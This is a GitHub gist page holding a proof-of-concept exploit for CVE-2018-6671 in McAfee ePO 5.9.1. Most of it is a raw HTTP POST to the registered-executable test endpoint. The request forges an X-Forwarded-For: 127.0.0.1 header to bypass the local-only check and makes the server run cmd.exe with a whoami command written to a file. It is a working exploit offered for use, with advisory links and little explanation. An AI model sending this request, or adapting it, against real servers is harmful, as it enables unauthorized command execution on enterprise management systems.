-
-
Save unbaiat/c56d8e55720e03b24c56e7001b382e53 to your computer and use it in GitHub Desktop.
cve-2018-6671 McAfee ePO 5.9.1 Registered Executable Local Access Bypass
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # CVE-2018-6671 McAfee ePO 5.9.1 Registered Executable Local Access Bypass | |
| # Specifying an X-Forwarded-For header bypasses the local only check | |
| # https://kc.mcafee.com/corporate/index?page=content&id=SB10240 | |
| # https://nvd.nist.gov/vuln/detail/CVE-2018-6671 | |
| # | |
| # 2019 @leonjza | |
| # | |
| # Tested on ePO v5.9.1, missing hotfix EPO5xHF1229850 | |
| POST /Notifications/testRegExe.do HTTP/1.1 | |
| Host: 192.168.1.26:8443 | |
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0 | |
| Accept: */* | |
| Accept-Language: en-US,en;q=0.5 | |
| Accept-Encoding: gzip, deflate | |
| Referer: https://192.168.1.26:8443/Notifications/addRegExecutable.do?orion.user.security.token=Bp5pZJOQll2vryhC | |
| Content-Type: application/x-www-form-urlencoded; charset=UTF-8 | |
| Content-Length: 284 | |
| DNT: 1 | |
| Connection: close | |
| Cookie: JSESSIONID=645BCB1CE5B7DBE1B9EDC7BB9F2F7349.route1; orion.login.language="language:en&country:"; orion.content.size="width:1384&height:699"; JSESSIONIDSSO=4D970A5F2DBF48309F796DF38B80FC15 | |
| X-Forwarded-For: 127.0.0.1 | |
| orion.user.security.token=Bp5pZJOQll2vryhC&orion.user.security.token=Bp5pZJOQll2vryhC&executableName=CVE-2018-6671%20PoC&executablePath=c:\windows\system32\cmd.exe&userName=&pass=&passConfirm=&testExeArgs=/c whoami > c:\CVE-2018-6671.txt&testExeTime=60000&objectId=0&ajaxMode=standard |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment